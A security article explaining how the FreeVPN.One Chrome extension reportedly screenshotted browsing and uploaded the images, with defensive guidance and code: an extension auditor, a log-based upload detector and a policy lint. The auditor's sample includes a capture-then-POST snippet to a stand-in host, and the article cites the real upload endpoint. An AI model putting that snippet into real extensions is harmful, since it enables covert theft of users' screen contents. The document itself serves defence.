Featured Chrome Extension “FreeVPN.One” Caught Screenshotting Users’ Browsing — Here’s What You Need to Know (and Do)
If you installed a “free” VPN Chrome extension to stay private online, this story will make you rethink that choice. Security researchers say the Featured Chrome extension FreeVPN.One silently captures screenshots of users’ browsing and sends them to a remote server—no obvious consent, no clear local processing, and plenty of enterprise data loss risk.
Here’s why that matters: screenshots can reveal anything on your screen—customer records, EMR dashboards, CRM notes, banking portals, source code, M&A decks, or internal URLs. In the wrong hands, a single image can be as damaging as a database dump. If your organization allows unmanaged browser extensions, this is a wake-up call.
In this guide, I’ll break down what happened, how the capture worked, why it bypassed typical defenses, and exactly how CISOs and users can respond today—without resorting to panic.
What happened: a “Featured” extension behaving like spyware
According to Koi Security, the Chrome extension FreeVPN.One was found secretly capturing screenshots of users’ browsing sessions and uploading them to a server. Until recently, the extension displayed a verified badge in the Chrome Web Store. It still carries a “Featured” label—Google’s way of signaling an extension follows recommended practices in the store’s review program.
FreeVPN.One also touts an “AI Threat Detector” that claims to analyze webpages for safety. But researchers say triggering that feature caused a full-page screenshot to be captured and uploaded to aitd[.]one/analyze.php for server-side processing.
The extension’s own privacy policy reportedly admits it “may upload page screenshots and URLs to their secured servers.” The catch: the UI allegedly framed it as a one-time, local scan, while surveillance was already underway. The vendor responded that automatic screenshots were part of a Background Scanning feature meant to trigger only on suspicious domains, and that it was enabled by default but slated to move to explicit consent in a future update.
Whether you call it a misfeature or misuse, the result is the same: silent exfiltration of what’s on your screen.
How the screenshot capture worked under the hood
The researchers described a two-stage architecture. Here’s the simplified flow, in plain language:
1) A content script injects into every page
– The extension manifest includes a broad match pattern (e.g., https://*/* and http://*/*), letting it run on nearly any site.
– When a page loads, the content script waits about 1.1 seconds. This delay can help it avoid obvious detection and ensure the page is visually ready.
2) The background service worker grabs the image
– The content script sends a message (captureViewport) to the extension’s background service worker.
– The service worker calls Chrome’s privileged API to capture the visible tab.
That API is real and powerful: Chrome provides chrome.tabs.captureVisibleTab(), which lets extensions take a screenshot of the currently visible area. You can read the documentation here: chrome.tabs.captureVisibleTab(). Content scripts and service workers are standard extension building blocks, too: Content scripts and Service workers.
In short: if you grant an extension the right permissions, it can see a lot. And if it’s coded to capture and transmit, it can exfiltrate that data at speed.
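The flow above is also exactly what a defender can look for statically. The following is an added example (not code from the article, from Koi Security, or from the extension) of a Node.js audit for an unpacked extension: it flags broad host patterns, weighs permissions in the order the article recommends, and treats a screenshot API call combined with an outbound request as critical. The manifest and scripts at the bottom are constructed sample input, not the real extension.

```javascript
const BROAD_HOSTS = new Set(['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*']);
// Weights follow the article's ordering: all-site access > scripting > capture APIs > tabs/activeTab.
const PERMISSION_WEIGHT = { scripting: 5, tabs: 2, activeTab: 2, declarativeNetRequest: 1 };
const CAPTURE_API = /chrome\.tabs\.captureVisibleTab\b|chrome\.tabCapture\b|chrome\.desktopCapture\b/;
// fetch('https://host/...') or xhr.open('POST', 'https://host/...'): capture the destination host.
const UPLOAD_CALL = /(?:\bfetch|\.open)\s*\([^)]*?['"`](https?:\/\/[^/'"`]+)/g;

function hostPatterns(manifest) {
  const fromScripts = (manifest.content_scripts || []).flatMap((cs) => cs.matches || []);
  return [...(manifest.host_permissions || []), ...(manifest.permissions || []), ...fromScripts];
}

function auditManifest(manifest) {
  const findings = [];
  let score = 0;
  const broad = [...new Set(hostPatterns(manifest).filter((p) => BROAD_HOSTS.has(p)))];
  if (broad.length) { findings.push(`all-site access via ${broad.join(', ')}`); score += 10; }
  for (const p of manifest.permissions || []) {
    if (PERMISSION_WEIGHT[p]) { findings.push(`permission ${p}`); score += PERMISSION_WEIGHT[p]; }
  }
  return { score, findings };
}

function scanSource(name, code) {
  const findings = [];
  const capture = CAPTURE_API.test(code);
  if (capture) findings.push(`${name}: screenshot API call`);
  const hosts = [...new Set([...code.matchAll(UPLOAD_CALL)].map((m) => m[1]))];
  hosts.forEach((h) => findings.push(`${name}: outbound request to ${h}`));
  return { capture, hosts, findings };
}

function auditExtension(manifest, sources) {
  const result = auditManifest(manifest);
  let capture = false;
  const hosts = new Set();
  for (const [name, code] of Object.entries(sources)) {
    const s = scanSource(name, code);
    capture = capture || s.capture;
    s.hosts.forEach((h) => hosts.add(h));
    result.findings.push(...s.findings);
  }
  if (capture) result.score += 4;
  // The dangerous combination: screenshots are taken AND there is a path to ship them out.
  if (capture && hosts.size) { result.score += 10; result.findings.push('CRITICAL: screenshot capture with outbound upload'); }
  result.verdict = result.score >= 20 ? 'block' : result.score >= 10 ? 'review' : 'allow';
  return result;
}

// Constructed sample mirroring the two-stage layout the article describes (not the real extension).
const sampleManifest = {
  manifest_version: 3, name: 'sample-vpn', permissions: ['tabs', 'storage'], host_permissions: ['<all_urls>'],
  content_scripts: [{ matches: ['https://*/*', 'http://*/*'], js: ['content.js'] }],
  background: { service_worker: 'sw.js' },
};
const sampleSources = {
  'content.js': "setTimeout(() => chrome.runtime.sendMessage({ type: 'captureViewport' }), 1100);",
  'sw.js': "chrome.runtime.onMessage.addListener(async () => { const img = await chrome.tabs.captureVisibleTab();"
    + " await fetch('https://scanner.invalid/analyze.php', { method: 'POST', body: img }); });",
};
```

Run `auditExtension(sampleManifest, sampleSources)` against a real unpacked extension by loading its manifest.json and JS files into the same two arguments; the verdict thresholds are assumptions to tune for your fleet.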
Why this is especially dangerous for enterprises
Unmanaged browser extensions are a blind spot. They sit between endpoints and the web, with permissions that rival EDR agents—without the enterprise oversight. When employees install personal “free VPNs” on a work browser, they open a covert channel that typical network tools miss.
Industry voices are sounding the alarm:
- “This poses a major threat to industries with mobile, remote, or hybrid workforces… including finance, healthcare, legal, technology, consulting, and media,” noted Pareekh Jain, CEO at EIIRTrend & Pareekh Consulting. BYOD and frequent travel multiply the risk as employees seek privacy or geo-bypass tools.
- Manish Rawat, analyst at TechInsights, pointed out that younger, tech-forward workforces often experiment with consumer-grade tools outside IT visibility.
- Amit Jaju, senior managing director – India at Ankura Consulting, advises CISOs to inventory extensions across fleets, prioritize by permissions, look for screenshot API usage and outbound beacons, and move fast on blocklisting and cleanup.
Here’s the core problem: many organizations rely on default Chrome/Edge settings. Extensions sail through, persist after updates, and remain invisible to vulnerability management. Meanwhile, a single screenshot could expose PHI, PCI, IP, deal docs, admin panels, and session cookies visible on the page.
“Featured” in the Chrome Web Store doesn’t mean “safe for enterprise”
The “Featured” label on the Chrome Web Store reflects editorial selection and adherence to store guidelines—not a guarantee that an extension won’t change behavior after an update or use permissions in ways your enterprise would reject. Learn how the program works here: Featured badge overview.
Extensions can be updated silently. A trusted extension last month can become risky today if the publisher changes hands, monetizes data, or adds “security scanning” that ships your screens to a server. That’s why enterprises need policy controls—not store trust alone.
Indicators of exposure: how to tell if you or your org are affected
If FreeVPN.One or a similar extension is installed, treat it as potential exposure. Practical steps:
For individual users:
– Check installed extensions:
– Chrome: Menu > Extensions > Manage Extensions.
– Edge: Menu > Extensions > Manage extensions.
– Look for “FreeVPN.One” or any VPN/proxy/“AI Threat Detector” extension you don’t recognize.
– Review permissions:
– Does it have access to “Read and change all your data on all websites”?
– Does it say it can “Capture content of your screen” or similar?
– Audit activity:
– In DevTools > Network, watch for calls to suspicious domains (e.g., aitd[.]one) when you click “scan” or load pages.
– Remove it:
– Toggle off or Remove. Restart the browser.
For IT and security teams:
– Inventory extensions fleet-wide:
– Use Chrome Browser Cloud Management or your MDM/endpoint suite to collect extension lists and versions.
– Prioritize by permissions: all-site access, scripting, tabs, activeTab, declarativeNetRequest, and especially screenshot APIs.
– Reference Chrome enterprise policy docs: Policy list.
– Hunt for beacons:
– Query web proxies/CASB/EDR for outbound requests to suspicious domains noted in research.
– Look for spikes after extension updates.
– Assess data at risk:
– Identify high-sensitivity apps likely exposed in screenshots (EMR, ERP, CRM, code repos, admin consoles).
– Assume pages visible in foreground could have been captured.
Immediate containment: what CISOs should do now
Speed matters. Screenshot exfiltration is quick and quiet. Take decisive action:
1) Blocklist and remove high-risk categories
– VPN/proxy, coupon/price trackers, “AI page analyzers,” search helpers, and PDF converters with broad permissions.
– Use ExtensionInstallBlocklist and ExtensionSettings policies to block or force-remove. Policy docs: Extension policies.
2) Rotate credentials and clear sessions for exposed users
– Force sign-outs from sensitive SaaS and IdPs.
– Require password changes and refresh MFA sessions.
– Clear Chrome browsing data, cookies, and local storage.
3) Move to an allowlist model
– Default-deny for all extensions.
– Maintain a curated allowlist of vetted extensions.
– Auto-quarantine on permission escalation: if an extension requests new powerful permissions, require admin approval.
4) Disable developer mode and sideloading
– Prevent users from loading unpacked extensions or installing from outside authorized stores.
5) Expand monitoring and DLP
– Add detections for chrome.tabs.captureVisibleTab and suspicious extension messaging patterns.
– Tighten egress controls and anomaly detection for outbound image or multipart/form-data bursts to unknown hosts.
– Consider remote browser isolation for privileged workflows.
6) Train continuously
– Explain the risks of “free” VPNs and browser utilities.
– Clarify that “Featured” or “Verified” store labels are not enterprise trust signals.
– Extend policies to contractors and BYOD via managed browsers.
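Step 5 above (monitoring and DLP) and the earlier "hunt for beacons" guidance both come down to one detection: a burst of image or multipart POSTs from one user to a host nobody sanctioned. As an added example that is not part of the article, the following Node.js detection runs that logic over constructed proxy log lines; the log field layout is an assumed simplified format, and the sanctioned-host list and thresholds are assumptions to tune against your own telemetry.

```javascript
const SANCTIONED_HOSTS = new Set(['m365.example.com', 'crm.example.com']); // assumed allowlist
const UPLOAD_TYPES = /^(image\/|multipart\/form-data|application\/octet-stream)/;
const WINDOW_MS = 60_000, MIN_POSTS = 3, MIN_BYTES = 200_000; // assumed thresholds

// Constructed layout: ISO-time user method host path request-content-type request-bytes
function parseLine(line) {
  const [ts, user, method, host, path, ctype, bytes] = line.trim().split(/\s+/);
  if (!ts || bytes === undefined) return null;
  return { t: Date.parse(ts), user, method, host, path, ctype, bytes: Number(bytes) };
}

function detectUploadBursts(lines) {
  const byKey = new Map(); // user|host -> upload-like POSTs to non-sanctioned hosts
  for (const line of lines) {
    const e = parseLine(line);
    if (!e || e.method !== 'POST' || SANCTIONED_HOSTS.has(e.host) || !UPLOAD_TYPES.test(e.ctype)) continue;
    const key = `${e.user}|${e.host}`;
    if (!byKey.has(key)) byKey.set(key, []);
    byKey.get(key).push(e);
  }
  const alerts = [];
  for (const [key, events] of byKey) {
    events.sort((a, b) => a.t - b.t);
    let best = null, start = 0;
    // Sliding window: the densest WINDOW_MS span that meets both thresholds wins.
    for (let i = 0; i < events.length; i++) {
      while (events[i].t - events[start].t > WINDOW_MS) start++;
      const span = events.slice(start, i + 1);
      const bytes = span.reduce((sum, e) => sum + e.bytes, 0);
      if (span.length >= MIN_POSTS && bytes >= MIN_BYTES && (!best || span.length > best.posts))
        best = { posts: span.length, bytes, firstSeen: new Date(span[0].t).toISOString() };
    }
    if (best) {
      const [user, host] = key.split('|');
      alerts.push({ user, host, ...best });
    }
  }
  return alerts;
}

// Constructed sample: alice's browser posts a screenshot-sized PNG to an unknown host on
// every page load; bob uploads to a sanctioned app; carol makes a single large upload.
const SAMPLE_LOG = [
  '2025-01-15T10:00:00Z alice POST scanner.invalid /analyze.php image/png 120000',
  '2025-01-15T10:00:03Z bob POST m365.example.com /upload multipart/form-data 900000',
  '2025-01-15T10:00:12Z alice POST scanner.invalid /analyze.php image/png 120000',
  '2025-01-15T10:00:20Z alice GET news.example.org / text/html 0',
  '2025-01-15T10:00:25Z alice POST scanner.invalid /analyze.php image/png 120000',
  '2025-01-15T10:00:31Z carol POST files.invalid /api/put application/octet-stream 900000',
  '2025-01-15T10:00:40Z alice POST scanner.invalid /analyze.php image/png 120000',
];
```

Only alice trips the rule: four PNG uploads to the same unknown host inside one minute, which is what per-page-load capture looks like from the proxy's side. Correlate the alert's firstSeen with extension install or update events from your inventory to confirm the source.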
For more on extension architecture and risks:
– Chrome extensions model: Extensions overview.
– Managing Chrome in enterprises: Chrome Browser Cloud Management.
– NIST guidance on access control and data protection: NIST SP 800-53.
– EFF on VPN trust and privacy concerns: Should you trust your VPN? (context on VPN trust models).
How this slipped by: the permission and UX problem
Two factors make this kind of behavior hard to spot:
- Permission bundling: “Read and change all your data on all websites” covers a wide range of actions, from simple ad blocking to screenshot capture. Users accept it once and forget.
- UI trust theater: A button labeled “AI Threat Detector” sounds helpful. If the UI implies “local scan,” most users won’t suspect a full-page screenshot is leaving the device.
This is the gray zone where “security features” can become surveillance. The extension’s privacy policy may disclose upload rights, but if the UX implies otherwise, it erodes informed consent.
Free VPNs: the harsh economics you should remember
If you’re not paying for the product, your data—and your screen—can become the product. VPNs are expensive to run: bandwidth, exit nodes, abuse handling, uptime. Free VPNs often monetize by injecting ads, harvesting traffic, or, as alleged here, exporting page content for “analysis.”
Even paid VPNs require trust: they can see connection metadata, sometimes more. If you must use a VPN for personal privacy, choose a reputable, audited provider and prefer native apps over browser extensions. And never mix personal privacy tools with enterprise browsing where sensitive data is in view.
A good explainer on VPN trust models: EFF on VPNs.
Practical guidance for end users
If you installed FreeVPN.One or similar extensions, here’s what to do:
- Remove the extension now. Restart your browser.
- Change passwords for any accounts you accessed recently, starting with work accounts, email, and financial services.
- Log out of all sessions in your major apps and re-authenticate.
- Enable MFA everywhere.
- Review other installed extensions. Remove anything you don’t absolutely need.
- Set “On all sites” access to “On click” for any remaining extensions that support it.
You can review and manage site access per extension in Chrome. Learn more about extension permissions here: Manage Chrome extension permissions.
A repeatable playbook for enterprises
To prevent this class of incident, adopt a layered approach:
1) Governance and policy
– Default-deny with an allowlist of extensions.
– Use ExtensionSettings to force-install approved tools and block risky categories.
– Disable Developer Mode and external sources.
2) Vetted catalog and reviews
– Security review for any extension before allowlisting.
– Check publisher reputation, update cadence, and permission scope.
– Pin review snapshots: if a new update requests broader permissions, quarantine until reviewed.
3) Visibility and telemetry
– Collect extension inventories per device and per profile.
– Maintain a permission risk score (all-site access > scripting > capture APIs > tabs/activeTab).
– Alert on newly installed extensions or permission escalations.
4) Data-centric controls
– Browser Isolation for sensitive apps (admin consoles, finance, healthcare).
– CASB/DLP inspecting uploads and screenshots leaving your network.
– Disable copy/paste or printing in high-risk contexts as needed.
5) User experience and education
– Offer safe alternatives: corporate VPNs, approved password managers, and sanctioned utilities.
– Explain the “Featured ≠ enterprise-safe” reality.
– Make it easy to request exceptions—frustrated users will find workarounds.
For policy references:
– Chrome enterprise policies: chromeenterprise.google/policies.
– Edge extension management via Group Policy: Microsoft Edge policies.
A note on Chrome, Edge, and other Chromium browsers
Extensions built for Chrome often run on Microsoft Edge, Brave, Opera, and other Chromium-based browsers. This increases the potential blast radius. If your fleet standardizes on Edge but allows Chrome Web Store installs, the same risks apply. Lock down both:
- Edge: restrict installs to Microsoft’s Add-ons store or approved IDs; block Chrome Web Store installs if not required.
- Chrome: use ExtensionInstallAllowlist/Blocklist and ExtensionSettings to enforce.
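The containment steps (blocklist, allowlist model, disabled sideloading), the playbook's governance step and the Chrome lockdown above all reduce to one ExtensionSettings policy. As an added example that is not from the article or from Google's documentation, here is a weak policy beside a hardened one, with a small lint (Node.js) that checks the properties those steps call for. Extension IDs and hosts are constructed placeholders; the list of permissions blocked by default is an assumption to adjust to your own review policy.

```javascript
const WEBSTORE_UPDATE_URL = 'https://clients2.google.com/service/update2/crx';
// Permissions that open capture or injection paths; blocked by default, re-granted only after review.
const CAPTURE_CAPABLE = ['tabs', 'activeTab', 'scripting'];
const SENSITIVE_HOSTS = ['*://*.internal.example.com', '*://emr.example.com']; // placeholders

// Weak: one known-bad ID blocked, everything else installable (Chrome's default behaviour).
const weakPolicy = {
  'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa': { installation_mode: 'blocked' }, // placeholder ID
};

// Hardened: default-deny, no extension runs on sensitive hosts, capture-capable permissions
// blocked unless a reviewed allowlist entry re-enables one, and approved tools pinned to the Web Store.
const hardenedPolicy = {
  '*': {
    installation_mode: 'blocked',
    blocked_install_message: 'Request extensions through IT; see the allowlist process.',
    runtime_blocked_hosts: SENSITIVE_HOSTS,
    blocked_permissions: CAPTURE_CAPABLE,
  },
  'bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb': { // placeholder ID for a vetted password manager
    installation_mode: 'force_installed',
    update_url: WEBSTORE_UPDATE_URL,
    allowed_permissions: ['activeTab'], // re-enabled after security review
  },
};

function lintExtensionSettings(policy) {
  const issues = [], reviewItems = [];
  const def = policy['*'] || {};
  if (!['blocked', 'removed'].includes(def.installation_mode))
    issues.push('no default-deny: "*" must set installation_mode to "blocked"');
  if (!(def.runtime_blocked_hosts || []).length)
    issues.push('no runtime_blocked_hosts on "*": extensions may run on sensitive hosts');
  if (!CAPTURE_CAPABLE.every((p) => (def.blocked_permissions || []).includes(p)))
    issues.push('"*" does not block capture-capable permissions by default');
  for (const [id, cfg] of Object.entries(policy)) {
    if (id === '*') continue;
    if (!/^[a-p]{32}$/.test(id)) issues.push(`${id}: not a valid extension ID`);
    if (['force_installed', 'normal_installed'].includes(cfg.installation_mode) && cfg.update_url !== WEBSTORE_UPDATE_URL)
      issues.push(`${id}: installed from a non-Web-Store update_url`);
    const granted = (cfg.allowed_permissions || []).filter((p) => CAPTURE_CAPABLE.includes(p));
    if (granted.length) reviewItems.push(`${id}: re-enables ${granted.join(', ')}; keep the review record`);
  }
  return { issues, reviewItems };
}
```

The hardened object is what you would ship as the ExtensionSettings policy value (via Chrome Browser Cloud Management, Group Policy or your MDM); rerun the lint whenever an allowlist entry is added or an extension update asks for broader permissions.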
Note: Traditional Chrome on iOS does not support extensions. Desktop platforms are the primary concern, with limited extension support on some mobile Chromium variants outside official Chrome.
Transparency, consent, and the path forward
Let’s be fair: some extensions capture screenshots for legitimate features—full-page capture tools, visual QA, or accessibility checks. The difference is clear consent, local processing where possible, minimal permissions, and transparent UX.
If an extension claims to “analyze pages for threats,” it must be explicit when data leaves the device, what’s collected, how it’s secured, who can access it, and how long it’s stored. Anything less invites regulatory and reputational fallout, especially under privacy regimes like GDPR and HIPAA where screenshots can contain personal or protected health information.
For extension developers, the bar is rising. For enterprises, the solution isn’t to ban the web—it’s to govern it. Managed browsers, allowlists, and user education create a safer, faster path to productivity.
Key takeaways
- A popular, Featured Chrome extension, FreeVPN.One, was observed capturing and uploading screenshots—an obvious data exfil risk.
- The mechanism used standard Chrome APIs and a two-stage architecture (content script + background service worker).
- Relying on Web Store labels is not enough. Enterprises must enforce allowlists, monitor permissions, and block risky categories.
- Act now: remove unvetted VPN/coupon/helper extensions, rotate credentials, clear browser data, and tighten policies.
- Educate users: “free” often means you pay with data. For privacy and security, choose vetted tools and keep work browsing extension-light.
If this was helpful, consider subscribing for more practical security breakdowns and enterprise-ready playbooks. Your future incident response team will thank you.
FAQ: People also ask
Q: Is FreeVPN.One safe to use?
A: Based on the reported behavior—automatic screenshot capture and uploads without clear consent—it should be treated as unsafe, especially in enterprise contexts. Remove it and rotate credentials for accounts accessed while it was installed.
Q: Can Chrome extensions take screenshots of my browsing?
A: Yes. Extensions with the right permissions can call APIs like chrome.tabs.captureVisibleTab() to capture the visible area of your tab. That’s why permission reviews and allowlists are critical. See the API docs: captureVisibleTab.
Q: What does the “Featured” badge in the Chrome Web Store mean?
A: It indicates editorial selection and adherence to store guidelines, not an enterprise security guarantee. Extensions can change behavior over time. Learn more: Chrome Web Store Featured badge.
Q: How do I remove a suspicious Chrome extension?
A: Chrome > Menu > Extensions > Manage Extensions > Remove. Then restart the browser. Clear cookies and site data, and change passwords for sensitive accounts. Repeat on any other browsers you use.
Q: How can my company block risky extensions?
A: Use Chrome enterprise policies like ExtensionInstallBlocklist and ExtensionSettings to default-deny and allowlist approved IDs. Enforce via MDM or Chrome Browser Cloud Management. Policy reference: Chrome enterprise policies.
Q: What should CISOs look for when triaging this incident?
A: Inventory extensions, prioritize high-permission items, hunt for screenshot API usage and outbound connections to suspicious domains, remove/block risky extensions, rotate credentials, clear browser data, and move to an allowlist model.
Q: Are free VPNs safe?
A: Often not. VPNs are costly to operate, so “free” versions may monetize via ads, data collection, or traffic analysis. If you need a VPN, choose a reputable, audited provider and avoid mixing personal privacy tools with enterprise browsing. Context: EFF on choosing VPNs.
Q: Do Edge and other browsers face the same risk?
A: Yes. Chromium-based browsers like Edge support similar extension models. Enforce allowlists and policies across all browsers in your fleet, not just Chrome.
Q: How do I check an extension’s permissions?
A: In Chrome, go to Manage Extensions, click Details on the extension, and review “Site access” and permissions. Set access to “On click” where possible, or remove if unclear.
Q: What if an extension needs screenshots for a legitimate feature?
A: It must provide explicit, informed consent, use minimal permissions, process locally when possible, and be transparent about any uploads. Enterprises should still review and allowlist before deployment.